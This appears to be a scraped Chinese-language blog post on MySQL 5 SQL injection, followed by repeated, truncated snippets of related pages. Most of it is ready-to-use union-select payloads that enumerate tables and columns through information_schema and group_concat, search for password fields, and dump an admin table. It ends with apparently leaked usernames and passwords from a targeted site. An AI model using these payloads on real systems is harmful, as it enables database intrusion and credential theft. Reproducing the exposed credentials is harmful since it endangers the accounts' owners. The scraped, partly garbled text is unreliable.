對mysql5注入時,可以直接查詢information_schema中的tables表,快速找到所需的表段。同時可以利用group_concat函式,得到你想得到的東西,不用limit乙個乙個猜。
前面先轉轉別人的東西
and/**/1=2/**/union/**/select/**/1,2,group_concat(user(),0x7c7c,version(),0x7c7c,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18�
一次暴完表名,版本,資料庫名
and/**/1=2/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/from/**/information_schema.tables/**/where/**/table_schema=database()--
暴當前庫所有表名
一般來說如里表太多,不能一次暴完,就要加limit語句了,10個10個來
and/**/1=2/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/(select * from information_schema.tables where table_schema=database() limit 0,10) as test --
and/**/1=2/**/union/**/select/**/1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/from/**/information_schema.columns/**/where/**/table_name=(表的hex值)-- 暴表所有列 個人以為,其實如果只要找後台密碼,暴所有表名純是多餘。oracle注入是,可以快速定位pass欄位在那個表中,mysql5也是可以的。 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_schema =database() and column_name like 0x257061737325(%pass%的hex值)-- 直接暴出包含有pass欄位的表名,然後再爆此表的所有列名。 id=106522%20and%201=2%20union%20select%201,2,group_concat(admin_id,0x7c7c,admin_pass),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18 from admin-- 暴出所有使用者名稱和密碼,如下: admin||adminweb,jung||jung1979
mysql 5 5 注入 mysql5注入
對mysql5注入時,可以直接查詢information schema中的tables表,快速找到所需的表段。同時可以利用group concat函式,得到你想得到的東西,不用limit乙個乙個猜。前面先轉轉別人的東西 and 1 2 union select 1,2,group concat us...
mysql 5注入中group concat的使用
mysql中的information schema 結構用來儲存資料庫系統資訊 information schema 結構中這幾個表儲存的資訊,在注射中可以用到的幾個表。schemata 儲存資料庫名的,關鍵字段 schema name,表示資料庫名稱 tables 儲存表名的 關鍵字段 table...
mysql5注入中group concat的使用
mysql中的information schema 結構用來儲存資料庫系統資訊 information schema 結構中這幾個表儲存的資訊,在注射中可以用到的幾個表。schemata 儲存資料庫名的,關鍵字段 schema name,表示資料庫名稱 tables 儲存表名的 關鍵字段 table...